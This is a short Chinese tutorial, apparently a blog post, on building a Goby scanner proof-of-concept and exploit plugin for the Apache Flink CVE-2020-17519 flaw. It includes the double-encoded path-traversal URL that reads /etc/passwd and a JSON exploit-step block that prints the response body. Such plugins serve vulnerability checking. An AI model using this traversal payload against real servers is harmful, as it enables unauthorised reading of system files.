這里我們以最近爆出來的Apache Flink CVE-2020-17519來進行編寫測試。
下面我來說下其實goby poc+exp很簡單。
POC寫法
漏洞名稱+查詢規則 規則搞不懂參考旁邊問號。
然后在測試里面
測試URL:/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
填寫,請求方法,測試漏洞URL,昨們這里是get請求校驗,所以就填寫請求方法 漏洞url就行。
group里面的正則
code = 響應 200
body contains 返回一個值 我這里就設置默認為/bin/bash 如果是Linux主機存在漏洞肯定會返回/bin/bash,填寫好后。
找了個地址驗證下,發現存在漏洞到這里我們poc已經寫好了,然后我們提交。
去goby目錄找到我們剛剛寫好的插件,打開他。
在Scanstep上面添加語句:
"ExpParams": [
{
"name": "查看",
"type": "input",
"value": "點擊驗證",
"show": ""
}
],
然后將Scanstep部分復制下來,然后添加output|lastbody把響應的body展示出來。
"Exploitsteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
然后保存就行了。我們在去測試。好了這里已經完成了,大佬勿噴。。謝謝。